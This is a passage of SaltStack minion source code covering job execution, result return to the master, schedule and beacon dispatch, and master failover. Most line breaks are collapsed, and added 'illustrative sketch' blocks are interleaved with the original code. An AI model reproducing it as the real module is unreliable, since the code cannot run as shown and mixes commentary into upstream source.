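    if len(jid_queue) > hwm:
        jid_queue.pop(0)
    return False
# --- end sketch ---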
if multiprocessing_enabled and not salt.utils.platform.is_windows(): # we only want to join() immediately if we are daemonizing a process process.join() else: self.win_proc.append(process) def ctx(self): ''' Return a single context manager for the minion's data ''' if six.PY2: return contextlib.nested( self.functions.context_dict.clone(), self.returners.context_dict.clone(), self.executors.context_dict.clone(), ) else: exitstack = contextlib.ExitStack() exitstack.enter_context(self.functions.context_dict.clone()) exitstack.enter_context(self.returners.context_dict.clone()) exitstack.enter_context(self.executors.context_dict.clone()) return exitstack @classmethod def _target(cls, minion_instance, opts, data, connected): if not minion_instance: minion_instance = cls(opts) minion_instance.connected = connected if not hasattr(minion_instance, 'functions'): functions, returners, function_errors, executors = ( minion_instance._load_modules(grains=opts['grains']) ) minion_instance.functions = functions minion_instance.returners = returners minion_instance.function_errors = function_errors minion_instance.executors = executors if not hasattr(minion_instance, 'serial'): minion_instance.serial = salt.payload.Serial(opts) if not hasattr(minion_instance, 'proc_dir'): uid = salt.utils.user.get_uid(user=opts.get('user', None)) minion_instance.proc_dir = ( get_proc_dir(opts['cachedir'], uid=uid) ) def run_func(minion_instance, opts, data): if isinstance(data['fun'], tuple) or isinstance(data['fun'], list): return Minion._thread_multi_return(minion_instance, opts, data) else: return Minion._thread_return(minion_instance, opts, data) with tornado.stack_context.StackContext(functools.partial(RequestContext, {'data': data, 'opts': opts})): with tornado.stack_context.StackContext(minion_instance.ctx): run_func(minion_instance, opts, data) @classmethod def _thread_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' fn_ = os.path.join(minion_instance.proc_dir, data['jid']) if opts['multiprocessing'] and not salt.utils.platform.is_windows(): # Shutdown the multiprocessing before daemonizing salt.log.setup.shutdown_multiprocessing_logging() salt.utils.process.daemonize_if(opts) # Reconfigure multiprocessing logging after daemonizing salt.log.setup.setup_multiprocessing_logging() salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid'])) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid']) with salt.utils.files.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) ret = {'success': False} function_name = data['fun'] executors = data.get('module_executors') or \ getattr(minion_instance, 'module_executors', []) or \ opts.get('module_executors', ['direct_call']) allow_missing_funcs = any([ minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name) for executor in executors if '{0}.allow_missing_func' in minion_instance.executors ]) if function_name in minion_instance.functions or allow_missing_funcs is True: try: minion_blackout_violation = False if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False): whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', []) # this minion is blacked out. 
Only allow saltutil.refresh_pillar and the whitelist if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist: minion_blackout_violation = True # use minion_blackout_whitelist from grains if it exists if minion_instance.opts['grains'].get('minion_blackout', False): whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', []) if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist: minion_blackout_violation = True if minion_blackout_violation: raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' ' 'to False in pillar or grains to resume operations. Only ' 'saltutil.refresh_pillar allowed in blackout mode.') if function_name in minion_instance.functions: func = minion_instance.functions[function_name] args, kwargs = load_args_and_kwargs( func, data['arg'], data) else: # only run if function_name is not in minion_instance.functions and allow_missing_funcs is True func = function_name args, kwargs = data['arg'], data minion_instance.functions.pack['__context__']['retcode'] = 0 if isinstance(executors, six.string_types): executors = [executors] elif not isinstance(executors, list) or not executors: raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected". format(executors)) if opts.get('sudo_user', '') and executors[-1] != 'sudo': executors[-1] = 'sudo' # replace the last one with sudo log.trace('Executors list %s', executors) # pylint: disable=no-member for name in executors: fname = '{0}.execute'.format(name) if fname not in minion_instance.executors: raise SaltInvocationError("Executor '{0}' is not available".format(name)) return_data = minion_instance.executors[fname](opts, data, func, args, kwargs) if return_data is not None: break if isinstance(return_data, types.GeneratorType): ind = 0 iret = {} for single in return_data: if isinstance(single, dict) and isinstance(iret, dict): iret.update(single) else: if not iret: iret = [] iret.append(single) tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job') event_data = {'return': single} minion_instance._fire_master(event_data, tag) ind += 1 ret['return'] = iret else: ret['return'] = return_data retcode = minion_instance.functions.pack['__context__'].get( 'retcode', salt.defaults.exitcodes.EX_OK ) if retcode == salt.defaults.exitcodes.EX_OK: # No nonzero retcode in __context__ dunder. Check if return # is a dictionary with a "result" or "success" key. 
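# --- Illustrative sketch, not part of the original module ---
# The check below treats a dict return carrying result=False or success=False as a
# failure even when the module left no explicit retcode in __context__. Stand-alone
# version of that rule; `derive_retcode` is a hypothetical helper and the integer
# defaults stand in for salt.defaults.exitcodes.EX_OK / EX_GENERIC.
def derive_retcode(return_data, context_retcode, ex_ok=0, ex_generic=1):
    '''Trust the retcode set via __context__ first, then inspect the return data.'''
    if context_retcode != ex_ok:
        return context_retcode
    try:
        ok = all(return_data.get(x, True) for x in ('result', 'success'))
    except Exception:                  # return data is not a dict
        ok = True
    return ex_ok if ok else ex_generic
# --- end sketch ---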
try: func_result = all(return_data.get(x, True) for x in ('result', 'success')) except Exception: # return data is not a dict func_result = True if not func_result: retcode = salt.defaults.exitcodes.EX_GENERIC ret['retcode'] = retcode ret['success'] = retcode == salt.defaults.exitcodes.EX_OK except CommandNotFoundError as exc: msg = 'Command required for \'{0}\' not found'.format( function_name ) log.debug(msg, exc_info=True) ret['return'] = '{0}: {1}'.format(msg, exc) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except CommandExecutionError as exc: log.error( 'A command in \'%s\' had a problem: %s', function_name, exc, exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR: {0}'.format(exc) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except SaltInvocationError as exc: log.error( 'Problem executing \'%s\': %s', function_name, exc, exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR executing \'{0}\': {1}'.format( function_name, exc ) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except TypeError as exc: msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format( function_name, exc, func.__doc__ or '' ) log.warning(msg, exc_info_on_loglevel=logging.DEBUG) ret['return'] = msg ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC except Exception: msg = 'The minion function caused an exception' log.warning(msg, exc_info_on_loglevel=True) salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data) ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc()) ret['out'] = 'nested' ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC else: docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name)) if docs: docs[function_name] = minion_instance.functions.missing_fun_string(function_name) ret['return'] = docs else: ret['return'] = minion_instance.functions.missing_fun_string(function_name) mod_name = function_name.split('.')[0] if mod_name in minion_instance.function_errors: ret['return'] += ' Possible reasons: \'{0}\''.format( minion_instance.function_errors[mod_name] ) ret['success'] = False ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC ret['out'] = 'nested' ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'master_id' in data: ret['master_id'] = data['master_id'] if 'metadata' in data: if isinstance(data['metadata'], dict): ret['metadata'] = data['metadata'] else: log.warning('The metadata parameter must be a dictionary. Ignoring.') if minion_instance.connected: minion_instance._return_pub( ret, timeout=minion_instance._return_retry_timer() ) # Add default returners from minion config # Should have been coverted to comma-delimited string already if isinstance(opts.get('return'), six.string_types): if data['ret']: data['ret'] = ','.join((data['ret'], opts['return'])) else: data['ret'] = opts['return'] log.debug('minion return: %s', ret) # TODO: make a list? 
Seems odd to split it this late :/ if data['ret'] and isinstance(data['ret'], six.string_types): if 'ret_config' in data: ret['ret_config'] = data['ret_config'] if 'ret_kwargs' in data: ret['ret_kwargs'] = data['ret_kwargs'] ret['id'] = opts['id'] for returner in set(data['ret'].split(',')): try: returner_str = '{0}.returner'.format(returner) if returner_str in minion_instance.returners: minion_instance.returners[returner_str](ret) else: returner_err = minion_instance.returners.missing_fun_string(returner_str) log.error( 'Returner %s could not be loaded: %s', returner_str, returner_err ) except Exception as exc: log.exception( 'The return failed for job %s: %s', data['jid'], exc ) @classmethod def _thread_multi_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' fn_ = os.path.join(minion_instance.proc_dir, data['jid']) if opts['multiprocessing'] and not salt.utils.platform.is_windows(): # Shutdown the multiprocessing before daemonizing salt.log.setup.shutdown_multiprocessing_logging() salt.utils.process.daemonize_if(opts) # Reconfigure multiprocessing logging after daemonizing salt.log.setup.setup_multiprocessing_logging() salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid'])) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job with PID %s', sdata['pid']) with salt.utils.files.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) multifunc_ordered = opts.get('multifunc_ordered', False) num_funcs = len(data['fun']) if multifunc_ordered: ret = { 'return': [None] * num_funcs, 'retcode': [None] * num_funcs, 'success': [False] * num_funcs } else: ret = { 'return': {}, 'retcode': {}, 'success': {} } for ind in range(0, num_funcs): if not multifunc_ordered: ret['success'][data['fun'][ind]] = False try: minion_blackout_violation = False if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False): whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', []) # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist: minion_blackout_violation = True elif minion_instance.opts['grains'].get('minion_blackout', False): whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', []) if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist: minion_blackout_violation = True if minion_blackout_violation: raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' ' 'to False in pillar or grains to resume operations. Only ' 'saltutil.refresh_pillar allowed in blackout mode.') func = minion_instance.functions[data['fun'][ind]] args, kwargs = load_args_and_kwargs( func, data['arg'][ind], data) minion_instance.functions.pack['__context__']['retcode'] = 0 key = ind if multifunc_ordered else data['fun'][ind] ret['return'][key] = func(*args, **kwargs) retcode = minion_instance.functions.pack['__context__'].get( 'retcode', 0 ) if retcode == 0: # No nonzero retcode in __context__ dunder. Check if return # is a dictionary with a "result" or "success" key. 
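# --- Illustrative sketch, not part of the original module ---
# The result containers built above in _thread_multi_return() come in two layouts:
# positional lists when multifunc_ordered is set, otherwise dicts keyed by function
# name. Stand-alone version of that setup; `empty_multi_result` is a hypothetical
# helper name.
def empty_multi_result(num_funcs, multifunc_ordered):
    if multifunc_ordered:
        # positional: ret['return'][i] lines up with data['fun'][i]
        return {'return': [None] * num_funcs,
                'retcode': [None] * num_funcs,
                'success': [False] * num_funcs}
    # keyed by function name, e.g. ret['return']['test.ping']
    return {'return': {}, 'retcode': {}, 'success': {}}
# --- end sketch ---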
try: func_result = all(ret['return'][key].get(x, True) for x in ('result', 'success')) except Exception: # return data is not a dict func_result = True if not func_result: retcode = 1 ret['retcode'][key] = retcode ret['success'][key] = retcode == 0 except Exception as exc: trb = traceback.format_exc() log.warning('The minion function caused an exception: %s', exc) if multifunc_ordered: ret['return'][ind] = trb else: ret['return'][data['fun'][ind]] = trb ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'metadata' in data: ret['metadata'] = data['metadata'] if minion_instance.connected: minion_instance._return_pub( ret, timeout=minion_instance._return_retry_timer() ) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] if 'ret_kwargs' in data: ret['ret_kwargs'] = data['ret_kwargs'] for returner in set(data['ret'].split(',')): ret['id'] = opts['id'] try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job %s: %s', data['jid'], exc ) def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True): ''' Return the data from the executed command to the master server ''' jid = ret.get('jid', ret.get('__jid__')) fun = ret.get('fun', ret.get('__fun__')) if self.opts['multiprocessing']: fn_ = os.path.join(self.proc_dir, jid) if os.path.isfile(fn_): try: os.remove(fn_) except (OSError, IOError): # The file is gone already pass log.info('Returning information for job: %s', jid) log.trace('Return data: %s', ret) if ret_cmd == '_syndic_return': load = {'cmd': ret_cmd, 'id': self.opts['uid'], 'jid': jid, 'fun': fun, 'arg': ret.get('arg'), 'tgt': ret.get('tgt'), 'tgt_type': ret.get('tgt_type'), 'load': ret.get('__load__')} if '__master_id__' in ret: load['master_id'] = ret['__master_id__'] load['return'] = {} for key, value in six.iteritems(ret): if key.startswith('__'): continue load['return'][key] = value else: load = {'cmd': ret_cmd, 'id': self.opts['id']} for key, value in six.iteritems(ret): load[key] = value if 'out' in ret: if isinstance(ret['out'], six.string_types): load['out'] = ret['out'] else: log.error( 'Invalid outputter %s. This is likely a bug.', ret['out'] ) else: try: oput = self.functions[fun].__outputter__ except (KeyError, AttributeError, TypeError): pass else: if isinstance(oput, six.string_types): load['out'] = oput if self.opts['cache_jobs']: # Local job cache has been enabled if ret['jid'] == 'req': ret['jid'] = salt.utils.jid.gen_jid(self.opts) salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret) if not self.opts['pub_ret']: return '' def timeout_handler(*_): log.warning( 'The minion failed to return the job information for job %s. ' 'This is often due to the master being shut down or ' 'overloaded. 
If the master is running, consider increasing ' 'the worker_threads value.', jid ) return True if sync: try: ret_val = self._send_req_sync(load, timeout=timeout) except SaltReqTimeoutError: timeout_handler() return '' else: with tornado.stack_context.ExceptionStackContext(timeout_handler): ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg log.trace('ret_val = %s', ret_val) # pylint: disable=no-member return ret_val def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True): ''' Return the data from the executed command to the master server ''' if not isinstance(rets, list): rets = [rets] jids = {} for ret in rets: jid = ret.get('jid', ret.get('__jid__')) fun = ret.get('fun', ret.get('__fun__')) if self.opts['multiprocessing']: fn_ = os.path.join(self.proc_dir, jid) if os.path.isfile(fn_): try: os.remove(fn_) except (OSError, IOError): # The file is gone already pass log.info('Returning information for job: %s', jid) load = jids.setdefault(jid, {}) if ret_cmd == '_syndic_return': if not load: load.update({'id': self.opts['id'], 'jid': jid, 'fun': fun, 'arg': ret.get('arg'), 'tgt': ret.get('tgt'), 'tgt_type': ret.get('tgt_type'), 'load': ret.get('__load__'), 'return': {}}) if '__master_id__' in ret: load['master_id'] = ret['__master_id__'] for key, value in six.iteritems(ret): if key.startswith('__'): continue load['return'][key] = value else: load.update({'id': self.opts['id']}) for key, value in six.iteritems(ret): load[key] = value if 'out' in ret: if isinstance(ret['out'], six.string_types): load['out'] = ret['out'] else: log.error( 'Invalid outputter %s. This is likely a bug.', ret['out'] ) else: try: oput = self.functions[fun].__outputter__ except (KeyError, AttributeError, TypeError): pass else: if isinstance(oput, six.string_types): load['out'] = oput if self.opts['cache_jobs']: # Local job cache has been enabled salt.utils.minion.cache_jobs(self.opts, load['jid'], ret) load = {'cmd': ret_cmd, 'load': list(six.itervalues(jids))} def timeout_handler(*_): log.warning( 'The minion failed to return the job information for job %s. ' 'This is often due to the master being shut down or ' 'overloaded. If the master is running, consider increasing ' 'the worker_threads value.', jid ) return True if sync: try: ret_val = self._send_req_sync(load, timeout=timeout) except SaltReqTimeoutError: timeout_handler() return '' else: with tornado.stack_context.ExceptionStackContext(timeout_handler): ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg log.trace('ret_val = %s', ret_val) # pylint: disable=no-member return ret_val def _state_run(self): ''' Execute a state run based on information set in the minion config file ''' if self.opts['startup_states']: if self.opts.get('master_type', 'str') == 'disable' and \ self.opts.get('file_client', 'remote') == 'remote': log.warning( 'Cannot run startup_states when \'master_type\' is set ' 'to \'disable\' and \'file_client\' is set to ' '\'remote\'. Skipping.' 
) else: data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')} if self.opts['startup_states'] == 'sls': data['fun'] = 'state.sls' data['arg'] = [self.opts['sls_list']] elif self.opts['startup_states'] == 'top': data['fun'] = 'state.top' data['arg'] = [self.opts['top_file']] else: data['fun'] = 'state.highstate' data['arg'] = [] self._handle_decoded_payload(data) def _refresh_grains_watcher(self, refresh_interval_in_minutes): ''' Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion :param refresh_interval_in_minutes: :return: None ''' if '__update_grains' not in self.opts.get('schedule', {}): if 'schedule' not in self.opts: self.opts['schedule'] = {} self.opts['schedule'].update({ '__update_grains': { 'function': 'event.fire', 'args': [{}, 'grains_refresh'], 'minutes': refresh_interval_in_minutes } }) def _fire_master_minion_start(self): # Send an event to the master that the minion is live if self.opts['enable_legacy_startup_events']: # Old style event. Defaults to False in Sodium release. self._fire_master( 'Minion {0} started at {1}'.format( self.opts['id'], time.asctime() ), 'minion_start' ) # send name spaced event self._fire_master( 'Minion {0} started at {1}'.format( self.opts['id'], time.asctime() ), tagify([self.opts['id'], 'start'], 'minion'), ) def module_refresh(self, force_refresh=False, notify=False): ''' Refresh the functions and returners. ''' log.debug('Refreshing modules. Notify=%s', notify) self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify) self.schedule.functions = self.functions self.schedule.returners = self.returners def beacons_refresh(self): ''' Refresh the functions and returners. ''' log.debug('Refreshing beacons.') self.beacons = salt.beacons.Beacon(self.opts, self.functions) def matchers_refresh(self): ''' Refresh the matchers ''' log.debug('Refreshing matchers.') self.matchers = salt.loader.matchers(self.opts) # TODO: only allow one future in flight at a time? @tornado.gen.coroutine def pillar_refresh(self, force_refresh=False, notify=False): ''' Refresh the pillar ''' if self.connected: log.debug('Refreshing pillar. Notify: %s', notify) async_pillar = salt.pillar.get_async_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['saltenv'], pillarenv=self.opts.get('pillarenv'), ) try: self.opts['pillar'] = yield async_pillar.compile_pillar() if notify: evt = salt.utils.event.get_event('minion', opts=self.opts, listen=False) evt.fire_event({'complete': True}, tag=salt.defaults.events.MINION_PILLAR_COMPLETE) except SaltClientError: # Do not exit if a pillar refresh fails. log.error('Pillar data could not be refreshed. ' 'One or more masters may be down!') finally: async_pillar.destroy() self.module_refresh(force_refresh, notify) def manage_schedule(self, tag, data): ''' Refresh the functions and returners. 
''' func = data.get('func', None) name = data.get('name', None) schedule = data.get('schedule', None) where = data.get('where', None) persist = data.get('persist', None) funcs = {'delete': ('delete_job', (name, persist)), 'add': ('add_job', (schedule, persist)), 'modify': ('modify_job', (name, schedule, persist)), 'enable': ('enable_schedule', ()), 'disable': ('disable_schedule', ()), 'enable_job': ('enable_job', (name, persist)), 'disable_job': ('disable_job', (name, persist)), 'postpone_job': ('postpone_job', (name, data)), 'skip_job': ('skip_job', (name, data)), 'reload': ('reload', (schedule)), 'list': ('list', (where)), 'save_schedule': ('save_schedule', ()), 'get_next_fire_time': ('get_next_fire_time', (name))} # Call the appropriate schedule function try: alias, params = funcs.get(func) getattr(self.schedule, alias)(*params) except TypeError: log.error('Function "%s" is unavailable in salt.utils.scheduler', func) def manage_beacons(self, tag, data): ''' Manage Beacons ''' func = data.get('func', None) name = data.get('name', None) beacon_data = data.get('beacon_data', None) include_pillar = data.get('include_pillar', None) include_opts = data.get('include_opts', None) funcs = {'add': ('add_beacon', (name, beacon_data)), 'modify': ('modify_beacon', (name, beacon_data)), 'delete': ('delete_beacon', (name,)), 'enable': ('enable_beacons', ()), 'disable': ('disable_beacons', ()), 'enable_beacon': ('enable_beacon', (name,)), 'disable_beacon': ('disable_beacon', (name,)), 'list': ('list_beacons', (include_opts, include_pillar)), 'list_available': ('list_available_beacons', ()), 'validate_beacon': ('validate_beacon', (name, beacon_data)), 'reset': ('reset', ())} # Call the appropriate beacon function try: alias, params = funcs.get(func) getattr(self.beacons, alias)(*params) except AttributeError: log.error('Function "%s" is unavailable in salt.beacons', func) except TypeError as exc: log.info( 'Failed to handle %s with data(%s). Error: %s', tag, data, exc, exc_info_on_loglevel=logging.DEBUG ) def environ_setenv(self, tag, data): ''' Set the salt-minion main process environment according to the data contained in the minion event data ''' environ = data.get('environ', None) if environ is None: return False false_unsets = data.get('false_unsets', False) clear_all = data.get('clear_all', False) import salt.modules.environ as mod_environ return mod_environ.setenv(environ, false_unsets, clear_all) def _pre_tune(self): ''' Set the minion running flag and issue the appropriate warnings if the minion cannot be started or is already running ''' if self._running is None: self._running = True elif self._running is False: log.error( 'This %s was scheduled to stop. Not running %s.tune_in()', self.__class__.__name__, self.__class__.__name__ ) return elif self._running is True: log.error( 'This %s is already running. Not running %s.tune_in()', self.__class__.__name__, self.__class__.__name__ ) return try: log.info( '%s is starting as user \'%s\'', self.__class__.__name__, salt.utils.user.get_user() ) except Exception as err: # Only windows is allowed to fail here. See #3189. Log as debug in # that case. Else, error. 
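# --- Illustrative sketch, not part of the original module ---
# manage_schedule() and manage_beacons() above dispatch through a dict of
# (method_name, argument_tuple) pairs and getattr(). A minimal stand-alone version of
# that pattern with made-up target methods; note that one-element argument tuples need
# a trailing comma -- `(name,)` -- or the parentheses do not create a tuple at all.
class _DemoScheduleTarget(object):
    def delete_job(self, name, persist):
        return ('deleted', name, persist)

    def list(self, where):
        return ('listed', where)


def demo_dispatch(target, func, name=None, persist=None, where=None):
    funcs = {
        'delete': ('delete_job', (name, persist)),
        'list': ('list', (where,)),    # trailing comma keeps this a one-element tuple
    }
    try:
        alias, params = funcs[func]
        return getattr(target, alias)(*params)
    except (KeyError, TypeError):
        return None                    # unknown action or bad arguments
# --- end sketch ---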
log.log( salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR, 'Failed to get the user who is starting %s', self.__class__.__name__, exc_info=err ) def _mine_send(self, tag, data): ''' Send mine data to the master ''' channel = salt.transport.client.ReqChannel.factory(self.opts) data['tok'] = self.tok try: ret = channel.send(data) return ret except SaltReqTimeoutError: log.warning('Unable to send mine data to master.') return None finally: channel.close() def _handle_tag_module_refresh(self, tag, data): ''' Handle a module_refresh event ''' self.module_refresh( force_refresh=data.get('force_refresh', False), notify=data.get('notify', False) ) @tornado.gen.coroutine def _handle_tag_pillar_refresh(self, tag, data): ''' Handle a pillar_refresh event ''' yield self.pillar_refresh( force_refresh=data.get('force_refresh', False), notify=data.get('notify', False) ) def _handle_tag_beacons_refresh(self, tag, data): ''' Handle a beacon_refresh event ''' self.beacons_refresh() def _handle_tag_matchers_refresh(self, tag, data): ''' Handle a matchers_refresh event ''' self.matchers_refresh() def _handle_tag_manage_schedule(self, tag, data): ''' Handle a manage_schedule event ''' self.manage_schedule(tag, data) def _handle_tag_manage_beacons(self, tag, data): ''' Handle a manage_beacons event ''' self.manage_beacons(tag, data) def _handle_tag_grains_refresh(self, tag, data): ''' Handle a grains_refresh event ''' if (data.get('force_refresh', False) or self.grains_cache != self.opts['grains']): self.pillar_refresh(force_refresh=True) self.grains_cache = self.opts['grains'] def _handle_tag_environ_setenv(self, tag, data): ''' Handle a environ_setenv event ''' self.environ_setenv(tag, data) def _handle_tag_minion_mine(self, tag, data): ''' Handle a _minion_mine event ''' self._mine_send(tag, data) def _handle_tag_fire_master(self, tag, data): ''' Handle a fire_master event ''' if self.connected: log.debug('Forwarding master event tag=%s', data['tag']) self._fire_master(data['data'], data['tag'], data['events'], data['pretag']) def _handle_tag_master_disconnected_failback(self, tag, data): ''' Handle a master_disconnected_failback event ''' # if the master disconnect event is for a different master, raise an exception if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']: # not mine master, ignore return if tag.startswith(master_event(type='failback')): # if the master failback event is not for the top master, raise an exception if data['master'] != self.opts['master_list'][0]: raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format( data['master'], self.opts['master'])) # if the master failback event is for the current master, raise an exception elif data['master'] == self.opts['master'][0]: raise SaltException('Already connected to \'{0}\''.format(data['master'])) if self.connected: # we are not connected anymore self.connected = False log.info('Connection to master %s lost', self.opts['master']) # we can't use the config default here because the default '0' value is overloaded # to mean 'if 0 disable the job', but when salt detects a timeout it also sets up # these jobs master_alive_interval = self.opts['master_alive_interval'] or 60 if self.opts['master_type'] != 'failover': # modify the scheduled job to fire on reconnect if self.opts['transport'] != 'tcp': schedule = { 'function': 'status.master', 'seconds': master_alive_interval, 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': 
self.opts['master'], 'connected': False} } self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']), schedule=schedule) else: # delete the scheduled job to don't interfere with the failover process if self.opts['transport'] != 'tcp': self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True) log.info('Trying to tune in to next master from master-list') if hasattr(self, 'pub_channel'): self.pub_channel.on_recv(None) if hasattr(self.pub_channel, 'auth'): self.pub_channel.auth.invalidate() if hasattr(self.pub_channel, 'close'): self.pub_channel.close() del self.pub_channel # if eval_master finds a new master for us, self.connected # will be True again on successful master authentication try: master, self.pub_channel = yield self.eval_master( opts=self.opts, failed=True, failback=tag.startswith(master_event(type='failback'))) except SaltClientError: pass if self.connected: self.opts['master'] = master # re-init the subsystems to work with the new master log.info( 'Re-initialising subsystems for new master %s', self.opts['master'] ) # put the current schedule into the new loaders self.opts['schedule'] = self.schedule.option('schedule') self.functions, self.returners, self.function_errors, self.executors = self._load_modules() # make the schedule to use the new 'functions' loader self.schedule.functions = self.functions self.pub_channel.on_recv(self._handle_payload) self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # update scheduled job to run with the new master addr if self.opts['transport'] != 'tcp': schedule = { 'function': 'status.master', 'seconds': master_alive_interval, 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master'], 'connected': True} } self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']), schedule=schedule) if self.opts['master_failback'] and 'master_list' in self.opts: if self.opts['master'] != self.opts['master_list'][0]: schedule = { 'function': 'status.ping_master', 'seconds': self.opts['master_failback_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master_list'][0]} } self.schedule.modify_job(name=master_event(type='failback'), schedule=schedule) else: self.schedule.delete_job(name=master_event(type='failback'), persist=True) else: self.restart = True self.io_loop.stop() def _handle_tag_master_connected(self, tag, data): ''' Handle a master_connected event ''' # handle this event only once. 
otherwise it will pollute the log # also if master type is failover all the reconnection work is done # by `disconnected` event handler and this event must never happen, # anyway check it to be sure if not self.connected and self.opts['master_type'] != 'failover': log.info('Connection to master %s re-established', self.opts['master']) self.connected = True # modify the __master_alive job to only fire, # if the connection is lost again if self.opts['transport'] != 'tcp': if self.opts['master_alive_interval'] > 0: schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master'], 'connected': True} } self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']), schedule=schedule) else: self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True) def _handle_tag_schedule_return(self, tag, data): ''' Handle a _schedule_return event ''' # reporting current connection with master if data['schedule'].startswith(master_event(type='alive', master='')): if data['return']: log.debug( 'Connected to master %s', data['schedule'].split(master_event(type='alive', master=''))[1] ) self._return_pub(data, ret_cmd='_return', sync=False) def _handle_tag_salt_error(self, tag, data): ''' Handle a _salt_error event ''' if self.connected: log.debug('Forwarding salt error event tag=%s', tag) self._fire_master(data, tag) def _handle_tag_salt_auth_creds(self, tag, data): ''' Handle a salt_auth_creds event ''' key = tuple(data['key']) log.debug( 'Updating auth data for %s: %s -> %s', key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds'] ) salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds'] @tornado.gen.coroutine def handle_event(self, package): ''' Handle an event from the epull_sock (all local minion events) ''' if not self.ready: raise tornado.gen.Return() tag, data = salt.utils.event.SaltEvent.unpack(package) log.debug( 'Minion of \'%s\' is handling event tag \'%s\'', self.opts['master'], tag ) tag_functions = { 'beacons_refresh': self._handle_tag_beacons_refresh, 'environ_setenv': self._handle_tag_environ_setenv, 'fire_master': self._handle_tag_fire_master, 'grains_refresh': self._handle_tag_grains_refresh, 'matchers_refresh': self._handle_tag_matchers_refresh, 'manage_schedule': self._handle_tag_manage_schedule, 'manage_beacons': self._handle_tag_manage_beacons, '_minion_mine': self._handle_tag_minion_mine, 'module_refresh': self._handle_tag_module_refresh, 'pillar_refresh': self._handle_tag_pillar_refresh, 'salt/auth/creds': self._handle_tag_salt_auth_creds, '_salt_error': self._handle_tag_salt_error, '__schedule_return': self._handle_tag_schedule_return, master_event(type='disconnected'): self._handle_tag_master_disconnected_failback, master_event(type='failback'): self._handle_tag_master_disconnected_failback, master_event(type='connected'): self._handle_tag_master_connected, } # Run the appropriate function for tag_function in tag_functions: if tag.startswith(tag_function): tag_functions[tag_function](tag, data) def _fallback_cleanups(self): ''' Fallback cleanup routines, attempting to fix leaked processes, threads, etc. 
